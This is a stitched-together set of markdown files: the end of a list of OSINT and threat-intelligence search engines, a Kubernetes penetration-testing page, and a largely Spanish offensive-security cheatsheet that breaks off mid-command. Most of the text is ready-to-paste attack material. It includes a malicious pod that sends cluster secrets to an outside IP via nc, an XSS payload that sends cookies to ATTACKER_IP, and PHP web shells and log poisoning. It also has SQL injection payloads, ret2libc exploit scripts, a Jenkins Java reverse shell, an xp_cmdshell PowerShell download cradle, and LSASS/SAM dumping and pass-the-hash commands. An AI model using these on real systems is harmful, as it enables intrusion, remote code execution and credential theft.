Lookup Tool Can Uncover Personal Information, Social Media Data, Online Activity, Photos, and More - [AnyWho Phone Lookup](https://www.anywho.com/reverse-phone-lookup/) - Find out information associated with a phone number - [Radaris Phone Lookup](https://radaris.com/#findPhoneH) - Look up any phone number to see its owner and identify who's calling or texting you ### Threat Intelligence - [MITRE ATT&CK](https://attack.mitre.org/) - Globally-accessible knowledge base of adversary tactics and techniques - [PulseDive](https://pulsedive.com/) - Threat intelligence made easy - [ThreatCrowd](https://threatcrowd.org/) - A Search Engine for Threats - [ThreatMiner](https://www.threatminer.org/) - Data Mining for Threat Intelligence - [VirusTotal](https://www.virustotal.com/) - Analyze suspicious files, domains, IPs and URLs to detect malware and other breaches - [vx-underground.org](https://www.vx-underground.org/) - The largest collection of malware source code, samples, and papers on the internet - [bazaar.abuse.ch](https://bazaar.abuse.ch/browse/) - Malware sample database - [feodotracker.abuse.ch](https://feodotracker.abuse.ch/browse/) - List of botnet Command&Control servers - [sslbl.abuse.ch](https://sslbl.abuse.ch/ssl-certificates/) - All malicious SSL certificates - [urlhaus.abuse.ch](https://urlhaus.abuse.ch/browse/) - Propose new malware urls - [threatfox.abuse.ch](https://threatfox.abuse.ch/browse/) - Indicator Of Compromise (IOC) database - [yaraify.abuse.ch](https://yaraify.abuse.ch/) - Scan suspicious files such as malware samples or process dumps against a large repository of YARA rules - [Rescure](https://rescure.me/) - Curated cyber threat intelligence for everyone - [otx.alienvault](https://otx.alienvault.com/) - The World's First Truly Open Threat Intelligence Community - [urlquery.net](https://urlquery.net/) - Service for detecting and analyzing web-based malware - [socradar.io](https://socradar.io/) - Extension to your SOC team - [VirusShare](https://virusshare.com/) - System currently contains 48 million malware samples - [PassiveTotal](https://www.riskiq.com/products/passivetotal/) - Security intelligence that scales security operations and response - [malapi.io](https://malapi.io/) - Windows APIs used for malicious purposes - [filesec.io](https://filesec.io/) - Latest file extensions being used by attackers - [leakix.net](https://leakix.net/) - Search engine indexing public information and an open reporting platform linked to the results - [tria.ge](https://tria.ge/s) - Fully automated solution for high-volume malware analysis using advanced sandboxing technology - [Polyswarm](https://polyswarm.network/) - Launchpad for new technologies and innovative threat detection methods - [Cisco Talos](https://talosintelligence.com/) - The threat intelligence organization at the center of the Cisco Security portfolio - [scamsearch.io](https://scamsearch.io/#anchorCeckNow) - Find your scammer online & report them - [CyberCampaigns](http://www.cybercampaigns.net/) - Threat Actor information and Write-Ups - [ORKL](https://orkl.eu/) - The Community Driven Cyber Threat Intelligence Library - [Maltiverse](https://maltiverse.com/search) - Data from more than 100 different Threat Intelligence sources - [Inquest Labs](https://labs.inquest.net/) - Threat intelligence from hundreds of public, private, and internal sources to develop new FDR signatures and rules - [PhishTank](https://phishtank.org/) - Collaborative clearing house for data and information about phishing on the Internet - [IntelOwl](https://github.com/intelowlproject/IntelOwl) - Open Source Intelligence, or OSINT solution to get threat intelligence data about a specific file, an IP or a domain from a single API at scale - [Lupovis](https://prowl.lupovis.io/) - Analyze and collect data on Internet-wide scans and attacks in real-time. We use this data to identify and classify malicious actors - [AbuseIPDB](https://www.abuseipdb.com/) - Check the report history of any IP address to see if anyone else has reported malicious activities - [Sucuri SiteCheck](https://sitecheck.sucuri.net/) - Check websites for known malware, viruses, blacklisting status, website errors, out-of-date software, and malicious code - [Spamhaus](https://spamhaus.com) - Protect and investigate using IP and domain reputation data - [ThreatBook](https://threatbook.io/) - One step ahead of your adversary with high-fidelity, efficient and actionable cyber threat intelligence - [ShadowServer](https://www.shadowserver.org/) - Nonprofit security organization working altruistically behind the scenes to make the Internet more secure for everyone - [Team Cymru](https://www.team-cymru.com/) - Global leader in cyber threat intelligence and attack surface management - [BeVigil](https://bevigil.com/) - Search engine for mobile application security testing - [CIRCL](https://www.circl.lu/) - The Computer Incident Response Center Luxembourg is a government-driven initiative designed to gather, review, report and respond to computer security threats and incidents - [MetaDefender Cloud](https://metadefender.opswat.com/) - Advanced threat detection and prevention platform - [Cybersixgill](https://cybersixgill.com/) - Threat intelligence platform that provides access to a wide range of cybersecurity information, including dark web monitoring and threat actor analysis - [Hybrid Analysis](https://www.hybrid-analysis.com/) - Free malware analysis service for the community that detects and analyzes unknown threats using a unique Hybrid Analysis technology - [IBM X-Force Exchange](https://exchange.xforce.ibmcloud.com/) - Threat intelligence sharing platform enabling research on security threats, aggregation of intelligence, and collaboration with peers ### Web History - [Web Archive](https://web.archive.org/) - Explore more than 702 billion web pages saved over time - [Archive.ph](https://archive.ph/) - Create a copy of a webpage that will always be up even if the original link is down - [CachedPages](http://www.cachedpages.com/) - Get the cached page of any URL - [stored.website](https://stored.website/) - View cached web pages/website - [CommonCrawl](https://commoncrawl.org/) - Open repository of web crawl data - [UK Web Archive](https://www.webarchive.org.uk/ukwa/) - Collects millions of websites each year, preserving them for future generations - [Arquivo](https://arquivo.pt/) - Non-profit service that maintains information published on the web of interest to the Portuguese community - [Archive-It](https://archive-it.org/) - An archive of digital government and non-government organization (NGO) documents and reports - [HAW](https://haw.nsk.hr/en/) - Croatian Web Archive ### Surveillance cameras - [Insecam.org](http://www.insecam.org/en/) - The world biggest directory of online surveillance security cameras - [Surveillance under Surveillance](https://sunders.uber.space/) - Cameras and guards watching you almost everywhere ### Unclassified - [NetoGraph](https://netograph.io/) - Captures and indexes detailed, low-level snapshots of website behaviour - [DorkSearch](https://dorksearch.com/) - Speed up your Dorking - [usersearch.org](https://usersearch.org/) - Find someone by username or email on Social Networks, Dating Sites, Forums, Crypto Forums, Chat Sites and Blogs - [Pastebin](https://pastebin.com/) - Website where you can store text online for a set period of time ### Not working / Paused <!-- markdown-link-check-disable --> - [DNS.BufferOver.run](https://dns.bufferover.run/) <!-- markdown-link-check-enable --> --------- If you want to propose changes, just open an [issue](https://github.com/edoardottt/awesome-hacker-search-engines/issues) or a [pull request](https://github.com/edoardottt/awesome-hacker-search-engines/pulls). [edoardoottavianelli.it](https://www.edoardoottavianelli.it) to contact me.
# Kubernetes > Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google, and is now maintained by the Cloud Native Computing Foundation. ## Summary - [Tools](#tools) - [RBAC Configuration](#rbac-configuration) - [Listing Secrets](#listing-secrets) - [Access Any Resource or Verb](#access-any-resource-or-verb) - [Pod Creation](#pod-creation) - [Privilege to Use Pods/Exec](#privilege-to-use-pods-exec) - [Privilege to Get/Patch Rolebindings](#privilege-to-get-patch-rolebindings) - [Impersonating a Privileged Account](#impersonating-a-privileged-account) - [Privileged Service Account Token](#privileged-service-account-token) - [Interesting endpoints to reach](#interesting-endpoints-to-reach) - [API addresses that you should know](#api-addresses-that-you-should-know) - [References](#references) ## Tools * [kubeaudit](https://github.com/Shopify/kubeaudit) - Audit Kubernetes clusters against common security concerns * [kubesec.io](https://kubesec.io/) - Security risk analysis for Kubernetes resources * [kube-bench](https://github.com/aquasecurity/kube-bench) - Checks whether Kubernetes is deployed securely by running [CIS Kubernetes Benchmark](https://www.cisecurity.org/benchmark/kubernetes/) * [kube-hunter](https://github.com/aquasecurity/kube-hunter) - Hunt for security weaknesses in Kubernetes clusters * [katacoda](https://katacoda.com/courses/kubernetes) - Learn Kubernetes using interactive broser-based scenarios ## Service Token > As it turns out, when pods (a Kubernetes abstraction for a group of containers) are created they are automatically assigned the default service account, and a new volume is created containing the token for accessing the Kubernetes API. That volume is then mounted into all the containers in the pod. ```powershell $ cat /var/run/secrets/kubernetes.io/serviceaccount # kubectl makes cluster compromise trivial as it will use that serviceaccount token without additional prompting ``` ## RBAC Configuration ### Listing Secrets An attacker that gains access to list secrets in the cluster can use the following curl commands to get all secrets in "kube-system" namespace. ```powershell curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/ ``` ### Access Any Resource or Verb ```powershell resources: - '*' verbs: - '*' ``` ### Pod Creation Check your right with `kubectl get role system:controller:bootstrap-signer -n kube-system -o yaml`. Then create a malicious pod.yaml file. ```yaml apiVersion: v1 kind: Pod metadata: name: alpine namespace: kube-system spec: containers: - name: alpine image: alpine command: ["/bin/sh"] args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000'] serviceAccountName: bootstrap-signer automountServiceAccountToken: true hostNetwork: true ``` Then `kubectl apply -f malicious-pod.yaml` ### Privilege to Use Pods/Exec ```powershell kubectl exec -it <POD NAME> -n <PODS NAMESPACE> –- sh ``` ### Privilege to Get/Patch Rolebindings The purpose of this JSON file is to bind the admin "CluserRole" to the compromised service account. Create a malicious RoleBinging.json file. ```powershell { "apiVersion": "rbac.authorization.k8s.io/v1", "kind": "RoleBinding", "metadata": { "name": "malicious-rolebinding", "namespcaes": "default" }, "roleRef": { "apiGroup": "*", "kind": "ClusterRole", "name": "admin" }, "subjects": [ { "kind": "ServiceAccount", "name": "sa-comp" "namespace": "default" } ] } ``` ```powershell curl -k -v -X POST -H "Authorization: Bearer <JWT TOKEN>" -H "Content-Type: application/json" https://<master_ip>:<port>/apis/rbac.authorization.k8s.io/v1/namespaces/default/rolebindings -d @malicious-RoleBinging.json curl -k -v -X POST -H "Authorization: Bearer <COMPROMISED JWT TOKEN>" -H "Content-Type: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secret ``` ### Impersonating a Privileged Account ```powershell curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the impersonator)>" -H "Impersonate-Group: system:masters" -H "Impersonate-User: null" -H "Accept: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/ ``` ## Privileged Service Account Token ```powershell $ cat /run/secrets/kubernetes.io/serviceaccount/token $ curl -k -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/ ``` ## Interesting endpoints to reach ```powershell # List Pods curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/pods/ # List secrets curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/ # List deployments curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/deployments # List daemonsets curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/daemonsets ``` ## API addresses that you should know *(External network visibility)* ### cAdvisor ```powershell curl -k https://<IP Address>:4194 ``` ### Insecure API server ```powershell curl -k https://<IP Address>:8080 ``` ### Secure API Server ```powershell curl -k https://<IP Address>:(8|6)443/swaggerapi curl -k https://<IP Address>:(8|6)443/healthz curl -k https://<IP Address>:(8|6)443/api/v1 ``` ### etcd API ```powershell curl -k https://<IP address>:2379 curl -k https://<IP address>:2379/version etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only ``` ### Kubelet API ```powershell curl -k https://<IP address>:10250 curl -k https://<IP address>:10250/metrics curl -k https://<IP address>:10250/pods ``` ### kubelet (Read only) ```powershell curl -k https://<IP Address>:10255 http://<external-IP>:10255/pods ``` ## References - [Kubernetes Pentest Methodology Part 1 - by Or Ida on August 8, 2019](https://securityboulevard.com/2019/08/kubernetes-pentest-methodology-part-1) - [Kubernetes Pentest Methodology Part 2 - by Or Ida on September 5, 2019](https://securityboulevard.com/2019/09/kubernetes-pentest-methodology-part-2) - [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0)
# Cheatsheet Cosas copypaste # OSINT ## Email discovering Email addresses and patterns of a company ``` hunter.io ``` Email addresses, domains and URLs of a website ``` phonebook.cz ``` Verify emails ``` tools.emailhippo.com ``` ## Breached emails Confirmation of breached emails ``` haveibeenpwned.com ``` Breached accounts ``` https://github.com/hmaverickadams/breach-parse ``` ## Subdomaing discovering ``` crt.sh ``` # Network ### Port Scanning #### TCP/SYN ``` nmap -sS -sCV -p- IP --min-rate 5000 -Pn -n --open -v -oN nmap.txt ``` #### UDP top 500 ``` nmap -sU --top-ports 500 --open -T5 -v -n IP ``` #### SC/TP ``` nmap -sCV -p- -sS --min-rate 5000 --open -vvv -n -Pn IP -sY ``` #### Pivoting scan ``` proxychains nmap -sT -p- -sV -Pn -T5 -v -n --open IP ``` #### Vuln ``` nmap -sV -p PORTS --script vuln IP -oN nmap ``` ### SNMP MIB Tree ``` snmpwalk -c public -v1(snmp version) -t 10 IP ``` Users ``` snmpwalk -c public -v1 IP 1.3.6.1.4.1.77.1.2.25 ``` Processes ``` snmpwalk -c public -v1 IP 1.3.6.1.2.1.25.4.2.1.2 ``` Open TCP Ports ``` snmpwalk -c public -v1 IP 1.3.6.1.2.1.6.13.1.3 ``` Installed Software ``` snmpwalk -c public -v1 IP 1.3.6.1.2.1.25.6.3.1.2 ``` ### Host Discovery (ARP y DNS Resolution) #### Nmap ``` nmap -sn network/address ``` #### Python Script (ICMP scan) ``` wget https://raw.githubusercontent.com/CronoX1/Host-Discovery/main/Host-Discovery.py ``` #### Bash Script (Host Discovery) ``` #!/bin/bash for i in $(seq 1 254); do timeout 1 bash -c "ping -c 1 IP.$i" &>/dev/null && echo "[+] HOST IP.$i - ACTIVE" & done; wait ``` #### CMD oneliner ``` (for /L %a IN (1,1,254) DO ping /n 1 /w 1 IP.%a) | find "Reply" ``` #### Bash Script (Port scanning) ``` #!/bin/bash for port in $(seq 1 65535); do timeout 1 bash -c "echo '' > /dev/tcp/IP/$port" 2>/dev/null && echo "[+] Port $port - OPEN" & done; wait ``` ### Port Forwarding #### Socat ``` socat TCP-LISTEN:LISTENNING_PORT,fork sctp:REMOTE_IP:REMOTE_PORT ``` #### Chisel Atacante ``` ./chisel server --reverse -p ATACKER_PORT ``` Víctima ``` ./chisel client ATTACKER_IP:ATTACKER_PORT R:VICTIM_IP:VICTIM_PORT ``` #### SSH Local Port Forwarding ``` ssh -N -L ATTACKER_IP:ATTACKER_PORT:VICTIM_IP:VICTIM_PORT victimuser@ip ``` Remort Port Forwarding (Firewall) ``` ssh -N -R ATTACKER_IP:ATTACKER_PORT(listener):VICTIM_IP:VICTIM_PORT attackeruser@attackerip ``` ### Pivoting #### SSH Dynamic Port Forwarding ``` ssh -N -D ATTACKER_IP:ATTACKER_PORT victimuser@ip ``` (Edit Proxychains.conf) ``` [ProxyList] # add proxy here ... # meanwile # defaults set to "tor" socks4 127.0.0.1 ATTACKER_PORT ``` #### Chisel Attacker machine ``` ./chisel server --reverse -p PORT --socks5 ``` Victime Machine ``` ./chisel client ATTACKER_IP:ATTACKER_PORT R:127.0.0.1:socks ``` (Edit Proxychains.conf) ``` [ProxyList] # add proxy here ... # meanwile # defaults set to "tor" socks5 127.0.0.1 ATTACKER_PORT ``` #### sshuttle ``` sshuttle -r VICTIM_USER@VICTIM_IP --ssh-cmd 'ssh -i id_rsa' INTERNAL/NETWORK -x ATTACKER_IP ``` ### DNS #### dnsenum ``` dnsenum domain ``` #### Domain Zone Transfer (AXFR) ``` dig @IP dominio axfr ``` # Web ## Enumeration ### Directory Listing & subdomain discovering #### Wfuzz Directory Listing ``` wfuzz -c --hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://Domain-or-IP/FUZZ ``` Subdomaing Discovering ``` wfuzz -c --hc=404 -t 200 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.dominio.ext" url ``` #### Gobuster Directory Listing ``` gobuster dir -e -u http://Domain-or-IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ``` Subdomaing Discovering ``` gobuster vhost -u url -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain ``` ## XSS ``` <script>document.location="http://ATTACKER_IP/value_cookie="+document.cookie</script> ``` ## WordPress ### WPscan Enumerate vulnerable plugins with aggressive mode ``` wpscan -e vp --plugins-detection aggressive --api-token TOKEN --url URL ``` Enumerate users ``` wpscan --enumerate u –-url URL ``` Bruteforce ``` wpscan -U userlist -P passwordlist --url URL ``` ## LFI ### PHP Wrappers Base64 ``` php://filter/convert.base64-encode/resource=nombre_archivo.php ``` ### Archivos interesantes que leer System users ``` curl -s 'http://domino/archivo.php?file=/etc/passwd' ``` Groups of the users ``` curl -s 'http://domino/archivo.php?file=/etc/group' ``` SSH private key ``` curl -s 'http://domino/archivo.php?file=/home/usuario/.ssh/id_rsa' ``` Software active in the machine ``` curl -s 'http://domino/archivo.php?file=/proc/sched_debug' ``` IP of the machine ``` curl -s 'http://domino/archivo.php?file=/proc/net/fib_trie' ``` Open ports inside the machine ``` for port in $(curl -s 'http://dominio/archivo.php?post=/proc/net/tcp' | awk '{print $2}' | grep -v "local_address" | awk '{print $2}' FS=":" | sort -u); do echo "Puerto --> $(echo "ibase=16; $port" | bc)"; done ``` ### LFI to RCE #### Apache Logs Poisoning Add in User Agent ``` <?php system($_GET['cmd']); ?> ``` RCE ``` /var/log/httpd-access.log&cmd=id ``` ``` /var/log/apache2/access.log&cmd=id ``` #### SSH Log Poisoning SSH payload injection ``` ssh '<?php system($_GET['cmd']); ?>'@IP ``` RCE ``` /var/log/auth.log&cmd=id ``` ## SQL Injection Database (BBDD, DB) enumeration (sustituir el numero correspondiente del último valor por 'database()' para saber el nombre de la BBDD) ``` UNION SELECT 1,2,... ``` ### Payloads ``` ' ``` ``` )' ``` ``` '' ``` ``` ` ``` ``` ') ``` ``` '') ``` ``` `) ``` ``` ')) ``` ``` `) ``` ``` '-SLEEP(30); # ``` ### In-band or Error Based Tables enumeration ``` UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'nombre_BBDD'; - -- ``` Columns of table enumeration ``` UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'nombre_tabla'; - -- ``` Table dumping ``` UNION SELECT 1,2,group_concat(columna1,':',columna2 SEPARATOR '<br>') FROM nombre_tabla; - -- ``` ### Blind SQLI Login Bypass ``` ' or 1=1 - -- ``` ``` ' or '1'='1'# ``` ``` ' or '1'=1 --+ ``` ``` user' or 1=1;# ``` ``` user' or 1=1 LIMIT 1;# ``` ``` user' or 1=1 LIMIT 0,1;# ``` ### Boolean Based (poner siempre por defecto 'false') Database enumeration brute force attack(sin sustituir ninguno de los numeros) ``` UNION SELECT 1,2,3 where database() like '%'; - -- ``` Tables enumeration ``` UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'BBDD' and table_name like '%';- -- ``` Columns enumeration ``` UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='BBDD' and TABLE_NAME='nombre_tabla' and COLUMN_NAME like '%'; - -- ``` Columns enumeration una vez encontrada una columna ``` UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='BBDD' and TABLE_NAME='nombre_tabla' and COLUMN_NAME like '%' and COLUMN_NAME !='nombre_tabla_encontrada'; - -- ``` Table dumping ``` UNION SELECT 1,2,3 from nombre_tabla where nombre_columna like '%' and nombre_columna like '%'; - -- ``` ### Time Based Injección UNION BASED SQL ``` UNION SELECT SLEEP(5),2,...; - -- ``` MSSQL ``` IF EXISTS (SELECT 1 FROM dbo.users WITH(NOLOCK) WHERE username like 'a%') WAITFOR DELAY '0:0:5'-- -- ``` ### PHP Web Shell ``` select "<?php system($_GET['cmd']);?>" into outfile '/var/www/html/cronoshell.php' ``` # Passwords attack Custom password dictionary ``` hashcat --stdout -r rules/best64.rule file ``` ## Bruteforce Services ``` hydra -L users.txt -P passwords.txt ssh://IP ``` Web ``` hydra -L users.txt -P passwords.txt domain.ext http-post-form "/login.php:username=^USER^&password=^PASS^:Login failed" ``` # Linux ## Usefull commands Search files ``` find / -name nombre_archivo 2>/dev/null ``` Search file with an specific word ``` grep -r -i "palabra_a_buscar" 2>/dev/null ``` Check open ports ``` netstat -tulpn | grep LISTEN ``` Create a passwd password ``` mkpasswd --method=MD5 --stdin ``` ## Listeners Paquetes ICMP ``` tcpdump -i NETINTERFACE icmp -n ``` Shell nc ``` nc -lvnp PORT ``` Shell chetada ``` rlwrap nc -lvnp PORT ``` ## Post-Explotation Create an HTTP Server ``` python3 -m http.server PORT ``` SUID perms ``` find / -user root -perm /4000 2>/dev/null ``` Run as root ``` sudo -l ``` Schedulled tasks ``` cat /etc/crontab ``` ### PEASS-ng ``` https://github.com/carlospolop/PEASS-ng ``` ### Mejorar Shell ``` script /dev/null -c bash ``` ``` stty raw -echo ;fg ``` ``` reset xterm ``` ``` export TERM=xterm ``` ``` export SHELL=bash ``` # Reverse Shell RCE PHP ``` <?php system($_GET['cmd']);?> ``` RCE .aspx ``` https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx ``` Shell PHP ``` wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php ``` ## msfvenom Windows ``` msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f ext > file.ext ``` Meterpreter shell ``` msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f ext > file.ext ``` ``` msfconsole -x "use multi/handler; set payload windows/meterpreter/reverse_tcp;set LHOST IP;set LPORT PORT" ``` # Bash ## Eliminar palabras ``` tr -d 'palabra' ``` ## Filtrar por una palabra ``` grep "palabra" ``` ## Seleccionar la palabra a filtrar en la linea ``` awk '{print $lugar}' ``` ## Filtrar una palabra que esté entre caracteres ``` grep -oP 'caracter.*?caracter' ``` ## Eliminar palabras repetidas ``` uniq ``` ## Separar palabras ``` tr -s ':' ' ' ``` # Buffer Overflow ## Linux [s4vitar - HTB October](https://youtu.be/3QZfUBVr-AA?t=4150) ### Taking the binary to the attacker machine On the victim machine ``` base64 -w 0 /usr/local/bin/ovrflw; echo ``` On the attacker machine ``` cat ovrflw | base64 -d | sponge ovrflw ``` ``` chmod +x ovrflw ``` ### Debugging the binary (gdb) ``` gdb ./ovrflw ``` Get the gef dependencies ``` pi import urllib.request as u, tempfile as t; g=t.NamedTemporaryFile(suffix='-gef.py'); open(g.name, 'wb+').write(u.urlopen('https://tinyurl.com/gef-main').read()); gdb.execute('source %s' % g.name) ``` Run the binary ``` r ``` Watching the functions ``` info function ``` Break point on "main" function ``` b *main ``` Watching the registers ``` i r ``` Check protections (NX is DEP = Data Execution Prevention) ``` checksec ``` Create a pattern ``` pattern create ``` Run the binary with the patern Find the offset ``` pattern offset $eip ``` Run the binary with the offset breakpoint to confirm ``` r $(python -c 'print("A"*offser_breakpoint + "B"*4)') ``` ### NX disable Set a breakpoint on the main function Check the system_addr_off ``` p system ``` Check the exit_addr_off ``` p exit ``` Check the bin_sh_addr_off ``` find "/bin/sh" ``` ``` #!/usr/bin/python3 from struct import pack from subprocess import call full_path_to_binary = offset = junk = b"A"*offset # All varibles must have the same number of characters base_libc_addr = system_addr_off = exit_addr_off = bin_sh_addr_off = system_addr = pack("<L", base_libc_addr + system_addr_off) exit_addr = pack("<L", base_libc_addr + exit_addr_off) bin_sh_addr = pack("<L", base_libc_addr + bin_sh_addr_off) payload = junk + system_addr + exit_addr + bin_sh_addr ret = call([full_path_to_binary, payload]) ``` ### NX enable Check the system architecture ``` uname -r ``` Check if ASLR is enable ("1" for disable, "2" for enable) ``` cat /proc/sys/kernel/randomize_va_space ``` Check Dynamic Dependencies ``` ldd /path/to/binary ``` #### Ret2libc eip --> system_addr + exit_addr + bin_sh_addr Check the system_addr_off and exit_addr_off ``` readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -E " system| exit" ``` Check the bin_sh_addr_off ``` strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh" ``` #### Exploit.py ``` #!/usr/bin/python3 from struct import pack from subprocess import call full_path_to_binary = offset = junk = b"A"*offset # ret2libc -> system_addr + exit_addr + bin_sh_addr # All varibles must have the same number of characters base_libc_addr = system_addr_off = exit_addr_off = bin_sh_addr_off = system_addr = pack("<L", base_libc_addr + system_addr_off) exit_addr = pack("<L", base_libc_addr + exit_addr_off) bin_sh_addr = pack("<L", base_libc_addr + bin_sh_addr_off) payload = junk + system_addr + exit_addr + bin_sh_addr while True: ret = call([full_path_to_binary, payload]) ``` # Jenkins ## Test default creds (admin:password) Users ``` jenkins admin administrator root ``` Passwords ``` password Password admin administrator jenkins root Password1 Password2 Password! 1234 12345 123456 1234567890 0987654321 qwerty ``` ## Brute Force ``` hydra -L users.txt -P /usr/share/wordlists/rockyou.txt IP -s PORT(8080 by default) http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" ``` ## Reverse Shell (Script Console) ``` String host="IP"; int port=PORT; String cmd="cmd.exe"; (/bin/bash for linux) Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` # File Transfer ## Windows ``` curl "http://ATTACKER_IP:PORT/file" -o file.ext ``` ``` certutil.exe -urlcache -f http://ATTACKER_IP:PORT/file file.ext ``` Create a share file through RDP ``` xfreerdp /u:USERNAME /p:PASSWORD /v:IP /d:DOMAIN /drive:SHARE,/full/path/of/sharefolder ``` ## Linux ``` scp filename <username>@Victim_IP:Victim_Directory/file ``` ``` wget http://IP/file ``` ``` curl "http://IP/file" -o file ``` # Windows ## Usefull commands Search a file ``` Get-Childitem C:\ -Include nombre_archivo -File -Recurse -erroraction 'silentlycontinue' ``` ``` dir /r /s filename ``` xFreeRDP ``` xfreerdp /u:USER /p:PASSWORD /v:IP /d:DOMAIN.local ``` ## Hashes Malicious SCF File ``` [Shell] Command=2 IconFile=\\IP\smbfolder\CronoX.ico [Taskbar] Command=ToggleDesktop ``` ``` impacket-smbserver smbFolder $(pwd) -smb2support ``` ## SMB User Enumeration ``` enum4linux IP ``` Permission enumeration ``` smbmap -H IP -u usuario -p password ``` Listing with Null Session ``` smbclient -L IP -N ``` Directory listing with an existing user ``` smbclient \\\\IP\\directorio -U 'username%password' ``` Vuln Scanning ``` nmap --script smb-vuln*.nse -p 139,445 IP -Pn ``` Protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED ``` smbclient -L IP --option="client min protocol=NT1" ``` SMB Enum Shares ``` nmap -p445 --script smb-enum-shares IP ``` ## MSSQL (Microsoft SQL Server) Connect to the DB with SQSH ``` sqsh -S <IP> -U <Username> -P <Password> -D <Database> ``` Enable xp_cmdshell ``` sp_configure 'Show Advanced Options', 1; RECONFIGURE; sp_configure 'xp_cmdshell', 1; RECONFIGURE; ``` Reverse Shell ``` EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://IP:PORT/binary") | powershell -noprofile' ``` Usefull commands [Hacktricks MSSQL](https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server) # Active Directory (AD) Kerberos user enumeration ``` kerbrute userenum -d domain.local users.txt --dc IP ``` ASREPRoasting ``` GetNPUsers.py domain.local/ -usersfile users.txt ``` Kerberoasting ``` GetUserSPNs.py domain.local/user:password -dc-ip IP -request ``` DRSUAPI (DCSync/NTDS Dumping) ``` secretsdump.py domain.local/USER:PASSWORD@IP ``` ``` crackmapexec smb network/address -u users -p passwords --ntds vss ``` Reverse shell ``` psexec.py domain/user:'password'@IP ``` ``` wmiexec.py domain/user:'password'@IP ``` ``` evil-winrm -i IP -u user -p 'password' ``` Pass the hash ``` evil-winrm -i IP -u user -H 'NTHash' ``` ``` psexec.py domain.local/user@ip -hashes 'LMHASH:NTHASH' ``` ``` wmiexec.py user@IP -hashes 'LMHASH:NTHASH' ``` LLMNR poisoning ``` responder -I NETINTERFACE -dw ``` SMB Relay [responder.conf con smb y http en "off" (SAM dumping without '-c')] ``` ntlmrelayx.py -tf targets.txt -smb2support -c "command" ``` Domain Host Discovery ``` crackmapexec smb network/address ``` User & Password Spraying ``` crackmapexec smb network/address -u users -p passwords ``` ## Post Explotation Userenum with RPC (-N para Null Session) ``` rpcclient -U 'domain.local\user%password' IP -c 'enumdomusers' | grep -oP '\[.*?\]' | grep -v '0x' ``` Descripcion usuarios with RPC ``` for rid in $(rpcclient -U 'dominio.local\user%password' IP -c 'enumdomusers' | grep -oP '\[.*?\]' | grep -v '0x'| tr -d '[]'); do echo -e "\n[+] Para el RID $rid:\n"; rpcclient -U 'dominio.local\user%password' IP -c "queryuser $rid" | grep -E -i "user name|description" ;done ``` Read GMSA Password ``` python3 gMSADumper.py -u 'user' -p 'password' -l IP -d domain.local ``` Read [LAPS](https://github.com/n00py/LAPSDumper) ``` python3 laps.py -u 'user' -p 'password' -l IP -d domain.local ``` ### Dump SAM and SYSTEM ``` reg save hklm\sam c:\sam ``` ``` reg save hklm\system c:\system ``` ### Dump LSASS Obtener el ID del proceso ``` (Get-Process lsass).id ``` Dump LSASS ``` rundll32 C:\Windows\System32\comsvcs.dll, MiniDump ID_del_Proceso lsass.dmp full ``` Create an SMB Server ``` impacket-smbserver smbFolder $(pwd) -smb2support ``` Copy the LSASS on the attacker machine ``` cp lsass.dump \\IP_ATACANTE\smbFolder\lsass.dmp ``` Pars the lsass.dmp ``` pypykatz lsa minidump lsass.dmp ``` ### Dump SAM & Security ``` reg save hklm\sam c:\sam reg save hklm\system 